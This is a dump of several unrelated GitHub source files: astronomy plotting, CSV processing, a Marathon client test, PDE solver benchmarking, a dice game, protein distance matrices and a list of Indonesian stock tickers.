offset\n cos_dRA = np.cos(np.pi/2-dec1) * np.cos(np.pi/2-dec1) + \\\n np.sin(np.pi/2-dec1) * np.sin(np.pi/2-dec1) * \\\n np.cos(ra1-ra_fib) \n\n # RA offset\n cos_dDEC = np.cos(np.pi/2-dec1) * np.cos(np.pi/2-dec_fib) + \\\n np.sin(np.pi/2-dec1) * np.sin(np.pi/2-dec_fib) * \\\n np.cos(ra1-ra1) \n\n # Sign check; trig collapses everything to a single quadrant\n if (ra_fib >= ra1) and (dec_fib >= dec1): # 1. quadrant (+, +)\n offset_ra[fibnum] = np.degrees(np.arccos(cos_dRA[0]))\n offset_dec[fibnum] = np.degrees(np.arccos(cos_dDEC[0]))\n\n if (ra_fib <= ra1) and (dec_fib >= dec1): # 2. quadrant (-, +)\n offset_ra[fibnum] = \\\n np.negative(np.degrees(np.arccos(cos_dRA[0])))\n offset_dec[fibnum] = np.degrees(np.arccos(cos_dDEC[0]))\n\n if (ra_fib <= ra1) and (dec_fib <= dec1): # 3. 
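The calibration above is just two magnitude equations: the star pins the zeropoint, zmag = m_star + 2.5·log10(counts_star), and (as used a few lines below) each fibre then gets sb = zmag − 2.5·log10(counts_fibre). A worked check with invented counts:

```python
import numpy as np

m_star = 15.2                                   # catalogue magnitude (made up)
counts_star = 8.0e4                             # summed star counts (made up)
zmag = m_star + 2.5 * np.log10(counts_star)     # instrumental zeropoint

counts_fibre = np.array([500.0, 1500.0, 4000.0])
sb = zmag - 2.5 * np.log10(counts_fibre)        # brighter fibre -> smaller mag
print(np.round(zmag, 2), np.round(sb, 2))       # 27.46 [20.71 19.52 18.45]
```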
quadrant (-, -)\n offset_ra[fibnum] = \\\n np.negative(np.degrees(np.arccos(cos_dRA[0])))\n offset_dec[fibnum] = \\\n np.negative(np.degrees(np.arccos(cos_dDEC[0])))\n\n if (ra_fib >= ra1) and (dec_fib <= dec1): # 4. quadrant (+, -)\n offset_ra[fibnum] = np.degrees(np.arccos(cos_dRA[0]))\n offset_dec[fibnum] = \\\n np.negative(np.degrees(np.arccos(cos_dDEC[0])))\n\n # Write a dictionary of relative RA, DEC lists\n datatab = {'RA': offset_ra, \n 'DEC': offset_dec} # proper, spherical trig, sky-projected\n\n # And finally get that surface brightness\n sb = zmag - 2.5 * np.log10(s_flux)\n \n # -------------------------\n # PLOT\n # -------------------------\n\n ax = fig.add_subplot(4,4,ifu_num)\n ax.set_aspect('equal')\n ax.set_xlim(-0.0022, 0.0022)\n ax.set_ylim(-0.0022, 0.0022)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n plt.title(\"Probe #\"+str(ifu_num))\n\n # Normalise sb array for plot colouring\n norm = sb-min(sb)\n sb_norm = norm/max(norm)\n\n # Make a colorbar that maintains scale\n mappable = plt.cm.ScalarMappable(cmap='gray')\n mappable.set_array(sb)\n plt.colorbar(mappable)\n\n for i in range(nfib):\n this_col = str(sb_norm[i])\n circ = Circle((datatab['RA'][i], \n datatab['DEC'][i]), 0.8/3600.,\n edgecolor='none', facecolor=this_col)\n ax.add_patch(circ)\n plt.show()\n\n\n\n # Report if no star was identified in the supplied RSS file or probe. \n if not found_star:\n if ifus=='all':\n print((\"Did not find a secondary star in RSS file '\"+rssin+\"'\"))\n else:\n print((\"Did not find a secondary star in Probe #\"+str(ifus)+\".\"))\n","repo_name":"SAMI-Galaxy-Survey/sami","sub_path":"observing/sn.py","file_name":"sn.py","file_ext":"py","file_size_in_byte":26835,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"30838255538","text":"a=\"geeks for geeks\"\np=\"geeks\"\n\ndef paterrn():\n # res keeps first matching occurence value 0\n res=a.find(p)\n # whenever res get -1 means there is no matching occurence,then loops end\n while res>=0:\n print(res)\n res=a.find(p,res+1)\n\n\nprint(paterrn())","repo_name":"Ashis101/py-dsa","sub_path":"patternst.py","file_name":"patternst.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9338443875","text":"\"\"\"\nEsta função faz a leitura do Dataset, manipula os dados e faz a escrita do arquivode saida.csv.\nParametros de entrada: (dataset_name, arquivo_saida, target_group, delimiter_charac, tipo_escrita, quote_sys)\n\"\"\"\n\ndef func_escrita(dataset_name, arquivo_saida, target_group, delimiter_charac\n , param1, param2, param3, param4, tipo_escrita, quote_sys):\n import csv\n from func_catch_headers import header_index\n from func_catch_inicio_fim import inicio_fim_index\n\n # Inicialização de variáveis\n # Cuidado c/ \"IndexError: list index out of range\" nem todas as tabelas são do mesmo tamanho\n dic1 = header_index(dataset_name, target_group)\n # Incío Blk posição inicio_fim_blk[0] e fim inicio_fim_blk[1]\n inicio_fim_blk = inicio_fim_index(dataset_name, target_group)\n #i = 0 # Contador de Linha nula\n line_count = 0 # Contador de linha\n header_count = 0\n list_out = []\n with open(arquivo_saida, mode='a') as database_file:\n database_writer = csv.writer(database_file, delimiter=delimiter_charac, quotechar='\"', quoting=quote_sys, lineterminator='\\n')\n ...\n with open(dataset_name, newline='') as csvfile:\n spamreader = 
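The pattern-search snippet above leans on `str.find`'s optional start argument: -1 means no further match, otherwise re-search from `res + 1`. Wrapped as a reusable generator (the name is mine), which also makes the overlap behaviour explicit:

```python
def find_all(text, pattern):
    """Yield every start index of pattern in text (overlaps included),
    using the same str.find(..., start) idiom as the loop above."""
    pos = text.find(pattern)
    while pos >= 0:
        yield pos
        pos = text.find(pattern, pos + 1)

print(list(find_all("geeks for geeks", "geeks")))   # [0, 10]
print(list(find_all("aaaa", "aa")))                 # overlapping: [0, 1, 2]
```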
csv.reader(csvfile, delimiter=delimiter_charac) # separe por vírgula ou ponto e vírgula\n for line in spamreader:\n linha = line # line é uma variável do tipo lista, com os campos das tabelas\n result = str(linha).find(\"End of Block\") # Transf. linha->string e verif. ocor. seq. str \"End of Block\"\n if line_count <= 2 and tipo_escrita == 0: # Primeiras três linhas da B.D.\n database_writer.writerow(line)\n if line_count == (inicio_fim_blk[0] - 1) and tipo_escrita == 0: # Primeiro Cabeçalho Grupo de dados\n database_writer.writerow(line)\n if line_count == inicio_fim_blk[0] and tipo_escrita == 0: # Segundo cabeçalho do Grupo de dados\n database_writer.writerow(line)\n if target_group in line and tipo_escrita == 1: # Bloco de Dados alvo customiz. está aqui\n ... # func_customize deve ser chamada aqui p/ customizar os dados do grupo alvo\n #database_writer.writerow(line) # Escreve linha original sem customização\n # End. campos alvo conv.: line[dic1[\"Grupo\"]], line[dic1[\"Column1\"]], line[dic1[\"Column2\"]]...\n if param1 == 1:\n list_out.append(line[dic1[\"Grupo\"]])\n if param2 == 1:\n list_out.append(line[dic1[\"Coluna1\"]])\n if param3 == 1:\n list_out.append(line[dic1[\"Coluna2\"]])\n if param4 == 1:\n list_out.append(line[dic1[\"Coluna3\"]])\n print(list_out)\n database_writer.writerow(list_out) # Escreve linha customizada\n list_out = []\n #print(line[dic1[param1]], line[dic1[param2]], line[dic1[param3]], line[dic1[param4]])\n if result > 0 and tipo_escrita == 2: # Escrita do rodapé da B.D.\n database_writer.writerow([])\n database_writer.writerow(line)\n line_count += 1\n\n\n# func_chamada_escrita gera as tuplas de escrita, c/ var. parâmetros tipo_escrita e quote_sys\ndef func_chamada_escrita(input_param_list):\n print(*input_param_list)\n ...\n tuplas_escritas = ((0, 0), (1, 1), (2, 0))\n for i in range(3):\n func_escrita(*input_param_list, *tuplas_escritas[i])\n\n\n# Para Teste da Função\n# Sequencia de escrita- (0,0) - Esc. Cabeçalhos, (1,1) - Esc. Bloco Dados (2,0) - Escreve rodapé\n# Parametros de entrada\n# dataset_name = \"xxxx.csv\" # Conjunto de dados para estudo\n# arquivo_saida = \"C:/Users/User/Documents/arquivosaida.csv\" # Espec. 
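`func_chamada_escrita` drives three passes over the same append-mode output file — the tuples (0, 0), (1, 1), (2, 0) select header, data block and footer — and passes `quote_sys` straight through as the writer's quoting mode, which works because `csv.QUOTE_MINIMAL` and `csv.QUOTE_ALL` are literally the integers 0 and 1. The mechanics in miniature, against an in-memory buffer:

```python
import csv
import io

assert csv.QUOTE_MINIMAL == 0 and csv.QUOTE_ALL == 1   # why passing 0/1 works

buf = io.StringIO()
passes = [(csv.QUOTE_MINIMAL, ['h1', 'h2']),   # pass 1: header row
          (csv.QUOTE_ALL, ['a', 'b']),         # pass 2: data row, fully quoted
          (csv.QUOTE_MINIMAL, ['end'])]        # pass 3: footer row
for quoting, row in passes:
    writer = csv.writer(buf, delimiter=';', quotechar='"',
                        quoting=quoting, lineterminator='\n')
    writer.writerow(row)
print(buf.getvalue())   # h1;h2 / "a";"b" / end
```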
caminho diretório saída e nome arquivo\n# target_group = \"Games\" # Grupo alvo da captura\n# tipo_escrita = 1 # 0= Escreve Cabeçalho, 1= Escreve Bloco de dados, 2= Escreve Rodape\n# quote_sys = 0 # 0=csv.QUOTE_MINIMAL, 1=csv.QUOTE_ALL\n# # Lista de parametros de entrada\n# input_param_list = (dataset_name, arquivo_saida, target_group, delimiter_charac)\n# func_chamada_escrita(input_param_list)","repo_name":"Vilson348/Script_Read_Write_CSV","sub_path":"func_writer.py","file_name":"func_writer.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28145796810","text":"#!/usr/bin/env python\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom dcos import errors\nimport mock\nfrom oslo_config import cfg\nimport requests_mock\n\nfrom kolla_mesos import exception\nfrom kolla_mesos import marathon\nfrom kolla_mesos.tests import base\n\n\nCONF = cfg.CONF\n\n\ndef add_app(app):\n return app\n\n\nclass TestMarathonClient(base.BaseTestCase):\n\n @requests_mock.mock()\n def setUp(self, req_mock):\n super(TestMarathonClient, self).setUp()\n CONF.set_override('host', 'http://127.0.0.1:8080', group='marathon')\n req_mock.get('http://127.0.0.1:8080/v2/info', json={\n 'version': '0.11.0'\n })\n self.client = marathon.Client()\n\n @mock.patch('dcos.marathon.Client.add_app')\n def test_add_app(self, dcos_add_app_mock):\n dcos_add_app_mock.side_effect = add_app\n\n with mock.patch.object(\n self.client, 'get_app', side_effect=errors.DCOSException()\n ):\n app = self.client.add_app({'id': 'my-new-app'})\n\n self.assertDictEqual(app, {'id': 'my-new-app'})\n\n @mock.patch.object(marathon, 'LOG')\n def test_add_app_already_existing(self, log_mock):\n CONF.set_override('force', False)\n with mock.patch.object(\n self.client, 'get_app', return_value={'id': 'my-app',\n 'other_param': 'the-old-one'}\n ):\n app = self.client.add_app({'id': 'my-app',\n 'other_param': 'the-new-one'})\n\n self.assertDictEqual(app, {'id': 'my-app',\n 'other_param': 'the-old-one'})\n log_mock.info.assert_called_with('App %s is already deployed. 
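`setUp` above stubs the Marathon `/v2/info` endpoint with requests_mock so `Client()` can probe the server version without a network. The same mechanics outside a test class, using the context-manager form of the mocker:

```python
import requests
import requests_mock

# Equivalent to the @requests_mock.mock() decorator used in the test above.
with requests_mock.Mocker() as m:
    m.get('http://127.0.0.1:8080/v2/info', json={'version': '0.11.0'})
    resp = requests.get('http://127.0.0.1:8080/v2/info')
    print(resp.json()['version'])   # '0.11.0', served by the mock
```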
'\n 'If you want to replace it, please '\n 'use --force flag.', 'my-app')\n\n @mock.patch('dcos.marathon.Client.add_app')\n def test_add_app_already_existing_force(self, dcos_add_app_mock):\n CONF.set_override('force', True)\n dcos_add_app_mock.side_effect = add_app\n\n with base.nested(mock.patch.object(\n self.client, 'get_app', return_value={'id': 'my-app',\n 'other_param': 'the-old-one'}\n ), mock.patch.object(self.client, 'remove_app')):\n self.assertRaises(exception.MarathonRollback,\n self.client.add_app,\n {'id': 'my-app', 'other_param': 'the-new-one'})\n","repo_name":"nhlfr/kolla-mesos","sub_path":"kolla_mesos/tests/test_marathon.py","file_name":"test_marathon.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37513312886","text":"from time import perf_counter\nfrom itertools import product\n\nfrom memory_profiler import memory_usage\nimport numpy as np\n\nfrom src.dl_solver_heat2d import solve_heat_with_dl\nfrom src.dl_solver_poisson import solve_poisson_with_dl\nfrom src.fem_solver_heat2d import solve_heat_with_fem\nfrom src.fem_solver_poisson import solve_poisson_with_fem\n\n\ndef _true_solution_heat(t, x, y):\n return 1 + x * x + 3 * y * y + 1.2 * t\n\n\ndef _true_solution_poisson(x, y):\n return 1 + x + 2 * y\n\n\ndef _eval_solver(func, is_dl, is_heat):\n print('Calculations started.')\n start = perf_counter()\n mem_usage, result = memory_usage((func, (True,)), max_usage=True, retval=True)\n stop = perf_counter()\n print('Calculations finished.')\n print(f'Elapsed time: {stop - start:.4f} sec.')\n print(f'Memory footprint: {mem_usage:.2f} MB.')\n\n print('Measuring accuracy.')\n # mesh\n Lx, Ly = 1, 1\n Nx, Ny = 9, 9\n x = np.linspace(0, Lx, Nx)\n y = np.linspace(0, Ly, Ny)\n xx, yy = np.meshgrid(x, y)\n\n # true solution\n u_true = None\n samples = None\n if is_heat:\n T = 2\n samples = list(product([T], x, y))\n u_true = np.array([_true_solution_heat(*s) for s in samples])\n u_true = np.reshape(u_true, (Nx, Ny), 'F')\n else:\n samples = list(product(x, y))\n u_true = np.array([_true_solution_poisson(*s) for s in samples])\n u_true = np.reshape(u_true, (Nx, Ny), 'F')\n\n assert u_true is not None\n assert samples is not None\n\n # estimated solution\n u_pred = None\n if is_dl:\n u_pred = result.predict(samples)\n u_pred = np.reshape(np.array(u_pred), (Nx, Ny), 'F')\n else:\n if isinstance(result, list):\n # take last time\n u_pred = np.reshape(result[-1], (Nx, Ny))\n else:\n u_pred = np.reshape(result, (Nx, Ny))\n\n assert u_pred is not None\n\n # error\n e = np.abs(u_true - u_pred)\n print(f'Average error: {e.mean()}.')\n print(f'Max error: {e.max()}.')\n\n\ndef run_comparison():\n # FEM\n _eval_solver(solve_heat_with_fem, False, True)\n _eval_solver(solve_poisson_with_fem, False, False)\n\n # DL\n _eval_solver(solve_heat_with_dl, True, True)\n _eval_solver(solve_poisson_with_dl, True, False)\n\n\nif __name__ == '__main__':\n run_comparison()\n","repo_name":"cor3bit/pde-solvers","sub_path":"src/run_comparison.py","file_name":"run_comparison.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2059034986","text":"str1=input(\"Enter First String : \")\r\nstr2=input(\"Enter Second String : \")\r\nif len(str1)==len(str2):\r\n print(\"Strings are of equal length.\")\r\n print(\"Common characters in the strings are : \")\r\n for i in range(0,len(str1),1):\r\n if 
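`_eval_solver` above wraps each solver in `perf_counter` for wall time and memory_profiler's `memory_usage((func, args), max_usage=True, retval=True)`, which hands back the peak memory together with the function's return value. The measurement pattern on its own (requires the memory-profiler package; recent versions return the peak as a float):

```python
from time import perf_counter

import numpy as np
from memory_profiler import memory_usage

def work(n):
    """Allocate and reduce a large array so there is something to measure."""
    return float(np.ones((n, n)).sum())

start = perf_counter()
peak_mb, result = memory_usage((work, (2000,)), max_usage=True, retval=True)
elapsed = perf_counter() - start
print(f'result={result:.0f}, {elapsed:.3f} s, peak {peak_mb:.1f} MiB')
```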
str1[i]==str2[i]:\r\n print(str1[i],end=\" \")\r\nelse:\r\n print(\"Strings are not of equal length.\")\r\n","repo_name":"paulram2810/Python-Programs","sub_path":"101.py","file_name":"101.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26532119566","text":"#DND Game Simulator\n#Current Functionality: Make basic character, roll for initiative\n\nimport random\n\n#global variables\nplayer = \"Test\"\n\n#Player class\nclass player():\n def __init__(self):\n self\n\n#Character class that defines what a character should look like\nclass character():\n\n #Gives parameters for character\n def __init__(self, name:str, sex:str, race:str, level:int, dex:int, strength:int):\n self.name = name\n self.sex = sex\n self.race = race\n self.level = level\n self.dex = dex\n self.strength = strength\n\n #Character level ups\n def levelUp(self, level_increase):\n self.level += level_increase\n\n #Dexterity increases\n def increaseDex(self, dex_increase):\n self.dex += dex_increase\n\n #Strength increases\n def increaseStrength(self, strength_increase):\n self.strength += strength_increase\n\n #Fucntions to return character details (will be made into a details() function later on\n def returnName(self):\n return self.name\n\n def returnSex(self):\n return self.sex\n\n def returnRace(self):\n return self.race\n\n def returnDex(self):\n return self.dex\n\n def returnStrength(self):\n return self.strength\n\n def returnLevel(self):\n return self.level\n\n#Dice class to construct the numerous dice needed to play\nclass dice():\n def __init__(self, sides):\n self.sides = sides\n\n #Allows the created dice to be rolled\n def roll(self):\n return random.randint(1, self.sides)\n\n#Makes a new character based on the information entered by the user\ndef makeNewCharacter():\n name = input(\"Please enter the name of your character: \")\n sex = input(\"Please enter the sex of your character: \")\n race = input(\"Please enter the race of your character: \")\n\n #This section ensures all numbers are entered as numbers\n while True:\n try:\n level = int(input(\"Please enter the level of your character (numerically): \"))\n except ValueError:\n print(\"Character level should be a number.\")\n else:\n break\n while True:\n try:\n dex = int(input(\"Please enter your character's dexterity (numerically): \"))\n except ValueError:\n print(\"Character dexterity should be a number.\")\n else:\n break\n while True:\n try:\n strength = int(input(\"Please enter your character's strength (numerically): \"))\n except ValueError:\n print(\"Character strength should be a number.\")\n else:\n break\n\n #Creates the new character and returns it\n new_character = character(name, sex, race, level, dex, strength)\n return new_character\n\n#Allows the user to roll for initiative\ndef initiative(player = character): #Currently not working as intended\n d20 = dice(20)\n initiative_roll = d20.roll()\n return initiative_roll\n\n#Creates a new battle\nclass battle():\n def __init__(self, monsters, players, encounter_level):\n self.monsters = monsters\n self.players = players\n self.encounter_level = encounter_level\n\ndef createNewBattle(self, monsters, players, encounter_level):\n battle(monsters, players, encounter_level)\n\n#Fights a battle that was selected\ndef fightBattle(battle):\n battle = \"battle\"\n\n#Makes interactive commands\ndef commands():\n\n #User needs to be able to create character, create encounter, roll initiative, and fight 
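`makeNewCharacter` repeats the same while/try/except block for level, dexterity and strength; the usual refactor is a small prompt helper so each stat costs one line. A sketch (the helper name is mine, not from the game):

```python
def ask_int(prompt, error='Please enter a number.'):
    """Re-prompt until the user types something int() accepts."""
    while True:
        try:
            return int(input(prompt))
        except ValueError:
            print(error)

# Usage inside makeNewCharacter would collapse to:
#   level = ask_int("Please enter the level of your character (numerically): ",
#                   "Character level should be a number.")
#   dex   = ask_int("Please enter your character's dexterity (numerically): ",
#                   "Character dexterity should be a number.")
```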
an\n #encounter, we need a while loop for entering the commands they want to do, an array of\n #the different commands available, and a way to exit the loop.\n commands_array = [\"Create New Character\", \"Create New Battle\", \"Roll Initiative\", \"Fight Battle\", \"Exit\"]\n print(\"\\nCommands:\")\n for i in range(len(commands_array)):\n print(commands_array[i])\n command = input(\"Please enter a command: \")\n print(\"Chosen command:\", command)\n while (command != \"Exit\"):\n if (command == \"Create New Character\"):\n makeNewCharacter()\n elif (command == \"Create New Battle\"):\n createNewBattle()\n elif (command == \"Roll Initiative\"):\n player_for_ini = input(\"Which player would you like to roll for?\")\n print(initiative(player_for_ini))\n command = \"Exit\"\n\n elif (command == \"Fight Battle\"):\n battle = input(\"Which battle would you like to fight?\")\n fightBattle(battle)\n elif (command == \"Exit\"):\n print(\"Thanks for playing\")\n else:\n print(\"Incorrect command was entered.\")\n command = input(\"Please look at the commands again and enter a correct command. \")\n\n\n\n#Main method, currently tests some of the code ive writrtgn\ndef main():\n player_one = makeNewCharacter()\n print(\"Name: \", player_one.returnName())\n print(\"Race: \", player_one.returnRace())\n print(\"Level: \", player_one.returnLevel())\n print(\"Dexterity: \", player_one.returnDex())\n print(\"Strength: \", player_one.returnStrength())\n print(\"Your initiative is: \", initiative(player_one))\n player_test = \"Player\"\n global player\n print(player)\n print(player_test)\n print(initiative())\n commands()\n\n#Runs the main method\nmain()","repo_name":"Mikel-millard/python","sub_path":"diceGame.py","file_name":"diceGame.py","file_ext":"py","file_size_in_byte":5248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30211259513","text":"'''\n# !/usr/bin/python3\n# -*- coding: utf-8 -*-\n@Time : 2021/11/22 20:30\n@Author : Qiufen.Chen\n@FileName: distance_TM.py\n@Software: PyCharm\n'''\n\nimport os\nimport numpy as np\nimport math\n\ndef make_dir(path):\n \"\"\"\n purpose: Created path folder\n :param path:\n :return:\n \"\"\"\n isExists = os.path.exists(path)\n if not isExists:\n os.makedirs(path)\n print(path + \" Created folder sucessful!\")\n return True\n else:\n print(\"This path is exist!\")\n return False\n\n\ndef get_matrix(input_dir, save_dir, threshold):\n file_num = 0\n count = 0\n for (root, dirs, files) in os.walk(input_dir):\n for file_name in files:\n file_num = file_num + 1\n with open(os.path.join(root, file_name), 'r') as f1:\n lines = f1.readlines()\n n = len(lines)\n\n initial_matrix = np.zeros((n, n))\n str1 = [0 for i in range(len(lines))] # 初始化0列表\n k = 0\n for line in lines:\n str1[k] = line[0:88] # 为列表赋值\n k = k + 1\n\n for i in range(0, len(lines)):\n # print(file_name, str1[i][84:88])\n if str1[i][84:88].strip() != 'T':\n continue\n\n x_1 = float(str1[i][30:38])\n y_1 = float(str1[i][38:46])\n z_1 = float(str1[i][46:56])\n\n for j in range(0, len(lines)):\n if str1[i][84:88].strip() != 'T':\n continue\n\n x_2 = float(str1[j][30:38])\n y_2 = float(str1[j][38:46])\n z_2 = float(str1[j][46:56])\n\n # 计算氨基酸之间的欧氏距离\n ans = math.sqrt(pow(x_1 - x_2, 2) + pow(y_1 - y_2, 2) + pow(z_1 - z_2, 2))\n # if ans <= threshold:\n # initial_matrix[i][j] = ans # 做成分类问题\n # 回归问题\n initial_matrix[i][j] = ans\n\n # print(initial_matrix.shape)\n print(initial_matrix.shape, initial_matrix.max(), initial_matrix.min())\n count = count 
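`get_matrix` above fills the N × N matrix with `math.sqrt` over three coordinate differences, one pair at a time (the Chinese comment on that line reads "compute the Euclidean distance between amino acids"); note also that the inner loop re-tests `str1[i][84:88]` where `str1[j]` looks intended. Once the coordinates sit in an (N, 3) array, numpy broadcasting produces the whole matrix at once:

```python
import numpy as np

rng = np.random.default_rng(1)
coords = rng.uniform(0.0, 50.0, (6, 3))       # N x 3 fake atom coordinates

# (N,1,3) - (1,N,3) broadcasts to an (N,N,3) cube of differences.
diff = coords[:, None, :] - coords[None, :, :]
dist = np.sqrt((diff ** 2).sum(axis=-1))      # full N x N distance matrix

i, j = 2, 4                                   # spot-check against the loop's formula
manual = np.sqrt(((coords[i] - coords[j]) ** 2).sum())
assert np.isclose(dist[i, j], manual)
print(dist.shape, round(float(dist[i, j]), 3))
```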
+ 1\n\n np.save(save_dir + '/' + str(file_name).split('.')[0], initial_matrix)\n\n print(\"Finished %d contact files.\" % count)\n\n\n# ----------------------------------------------------------------------------------------------\nif __name__ == \"__main__\":\n input_atom_dir = \"/lustre/home/qfchen/ContactMap/TMContact/atom_topo/\"\n output_matrix_dir = \"/lustre/home/qfchen/ContactMap/TMContact/new_lable/\"\n make_dir(input_atom_dir)\n\n get_matrix(input_atom_dir, output_matrix_dir, 8)\n\n\n\n\n\n\n\n","repo_name":"QiufenChen/TMP-SurResD","sub_path":"distance_TM.py","file_name":"distance_TM.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74683453927","text":"list = ['AALI',\n'ABBA',\n'ABDA',\n'ABMM',\n'ACES',\n'ACST',\n'ADCP',\n'ADES',\n'ADHI',\n'ADMF',\n'ADMG',\n'ADMR',\n'ADRO',\n'AGAR',\n'AGII',\n'AGRO',\n'AGRS',\n'AHAP',\n'AIMS',\n'AISA',\n'AKKU',\n'AKPI',\n'AKRA',\n'AKSI',\n'ALDO',\n'ALKA',\n'ALMI',\n'ALTO',\n'AMAG',\n'AMAN',\n'AMAR',\n'AMFG',\n'AMIN',\n'AMMS',\n'AMOR',\n'AMRT',\n'ANDI',\n'ANJT',\n'ANTM',\n'APEX',\n'APIC',\n'APII',\n'APLI',\n'APLN',\n'ARCI',\n'ARGO',\n'ARII',\n'ARKA',\n'ARKO',\n'ARMY',\n'ARNA',\n'ARTA',\n'ARTI',\n'ARTO',\n'ASBI',\n'ASDM',\n'ASGR',\n'ASHA',\n'ASII',\n'ASJT',\n'ASLC',\n'ASMI',\n'ASPI',\n'ASRI',\n'ASRM',\n'ASSA',\n'ATAP',\n'ATIC',\n'AUTO',\n'AVIA',\n'AXIO',\n'AYLS',\n'BABP',\n'BACA',\n'BAEK',\n'BAJA',\n'BALI',\n'BANK',\n'BAPA',\n'BAPI',\n'BATA',\n'BAUT',\n'BAYU',\n'BBCA',\n'BBHI',\n'BBKP',\n'BBLD',\n'BBMD',\n'BBNI',\n'BBRI',\n'BBRM',\n'BBSI',\n'BBSS',\n'BBTN',\n'BBYB',\n'BCAP',\n'BCIC',\n'BCIP',\n'BDMN',\n'BEBS',\n'BEEF',\n'BEKS',\n'BELI',\n'BELL',\n'BESS',\n'BEST',\n'BFIN',\n'BGTG',\n'BHAT',\n'BHIT',\n'BIKA',\n'BIKE',\n'BIMA',\n'BINA',\n'BINO',\n'BIPI',\n'BIPP',\n'BIRD',\n'BISI',\n'BJBR',\n'BJTM',\n'BKDP',\n'BKSL',\n'BKSW',\n'BLTA',\n'BLTZ',\n'BLUE',\n'BMAS',\n'BMHS',\n'BMRI',\n'BMSR',\n'BMTR',\n'BNBA',\n'BNBR',\n'BNGA',\n'BNII',\n'BNLI',\n'BOBA',\n'BOGA',\n'BOLA',\n'BOLT',\n'BOSS',\n'BPFI',\n'BPII',\n'BPTR',\n'BRAM',\n'BRIS',\n'BRMS',\n'BRNA',\n'BRPT',\n'BSBK',\n'BSDE',\n'BSIM',\n'BSML',\n'BSSR',\n'BSWD',\n'BTEK',\n'BTEL',\n'BTON',\n'BTPN',\n'BTPS',\n'BUAH',\n'BUDI',\n'BUKA',\n'BUKK',\n'BULL',\n'BUMI',\n'BUVA',\n'BVIC',\n'BWPT',\n'BYAN',\n'CAKK',\n'CAMP',\n'CANI',\n'CARE',\n'CARS',\n'CASA',\n'CASH',\n'CASS',\n'CBMF',\n'CBUT',\n'CCSI',\n'CEKA',\n'CENT',\n'CFIN',\n'CHEM',\n'CINT',\n'CITA',\n'CITY',\n'CLAY',\n'CLEO',\n'CLPI',\n'CMNP',\n'CMNT',\n'CMPP',\n'CMRY',\n'CNKO',\n'CNTB',\n'CNTX',\n'COAL',\n'COCO',\n'COWL',\n'CPIN',\n'CPRI',\n'CPRO',\n'CRAB',\n'CSAP',\n'CSIS',\n'CSMI',\n'CSRA',\n'CTBN',\n'CTRA',\n'CTTH',\n'DADA',\n'DART',\n'DAYA',\n'DCII',\n'DEAL',\n'DEFI',\n'DEPO',\n'DEWA',\n'DEWI',\n'DFAM',\n'DGIK',\n'DGNS',\n'DIGI',\n'DILD',\n'DIVA',\n'DKFT',\n'DLTA',\n'DMAS',\n'DMMX',\n'DMND',\n'DNAR',\n'DNET',\n'DOID',\n'DPNS',\n'DPUM',\n'DRMA',\n'DSFI',\n'DSNG',\n'DSSA',\n'DUCK',\n'DUTI',\n'DVLA',\n'DWGL',\n'DYAN',\n'EAST',\n'ECII',\n'EDGE',\n'EKAD',\n'ELPI',\n'ELSA',\n'ELTY',\n'EMDE',\n'EMTK',\n'ENAK',\n'ENRG',\n'ENVY',\n'ENZO',\n'EPAC',\n'EPMT',\n'ERAA',\n'ERTX',\n'ESIP',\n'ESSA',\n'ESTA',\n'ESTI',\n'ETWA',\n'EURO',\n'EXCL',\n'FAPA',\n'FAST',\n'FASW',\n'FILM',\n'FIMP',\n'FIRE',\n'FISH',\n'FITT',\n'FLMC',\n'FMII',\n'FOOD',\n'FORU',\n'FORZ',\n'FPNI',\n'FREN',\n'FUJI',\n'GAMA',\n'GDST',\n'GDYR',\n'GEMA',\n'GEMS',\n'GGRM',\n'GGRP',\n'GHON',\n'GIAA',\n'GJTL',\n'GLOB',\n'GLVA',\n'GMFI',\n'GMTD',\n'GOLD',\n'GOLL',\n'GOOD',\n'GOTO',\n'GPRA',\n'GPSO',\n'GSMF'
